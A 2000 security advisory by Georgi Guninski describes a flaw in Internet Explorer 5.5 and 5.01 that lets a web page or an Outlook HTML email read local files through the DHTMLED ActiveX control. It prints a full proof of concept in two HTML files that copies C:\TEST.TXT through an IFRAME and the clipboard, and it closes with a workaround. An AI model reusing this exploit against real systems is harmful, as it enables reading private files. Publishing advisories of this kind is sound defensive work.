Georgi Guninski security advisory #16, 2000

IE 5.5 and 5.01 vulnerability - reading at least local and from any host text and parsed html files

Systems affected: IE 5.5, 5.01 / Win98 - probably other versions, have not tested
Risk: Medium

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or  indirect use of the information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof.

Description:
Internet Explorer 5.5 and 5.01 under Windows 98 (suppose all other versions are also vulnerable) allow reading local and from any host text and parsed html files.
A danger is reading parsed web pages from intranet web servers behind a firewall.
It is exploitable from HTML email message - Outlook.
This is achieved with the DHTMLED ActiveX control.

Details:
The problem is the DHTMLED (DHTML Edit Control Safe for Scripting for IE5), which is used for basic HTML editing.
It allows opening a page with an IFRAME but have problems with DOM protection.
It is possible to select the content of the IFRAME (which may be a document residing anywhere, including local disk), copying it to the clipboard and then reading it from the clipboard. I have a feeling DHTMLED in combination with IFRAME may lead to more dangerous security risks.

The code is:
------dh2.html--------------------------------
<SCRIPT>
alert("This page reads C:\\TEST.TXT\nYou may need to create it.");
function f1()
{
dh.DOM.all.I1.focus();
dh.DOM.all.I1.document.execCommand("selectall");
dh.DOM.all.I1.document.execCommand("copy");
r=document.all.S1.createTextRange();
r.execCommand("paste");
alert("Here is your file: "+S1.value);
}

function loadit()
{
dh.loadURL("http://www.guninski.com/ifr2.html");
//                 ^^^^^^^^^^^^^^ You may need to edit this
setTimeout("f1()",5000);
}
setTimeout("loadit();",1000);
</SCRIPT>
---------------------------------------------------
---------ifr2.html---------------------------------
<HTML>
<IFRAME SRC="file://c:/test.txt" ID="I1" name="I1">
</IFRAME>
</HTML>
---------------------------------------------------

Demonstration is available

Workaround: Disable Active Scripting or Disable Run ActiveX controls and plug-ins (probably other workarounds).

Copyright 2000 Georgi Guninski
 

| Home | Internet Explorer | Windows 2000 | AIX | Netscape | Greets | More... |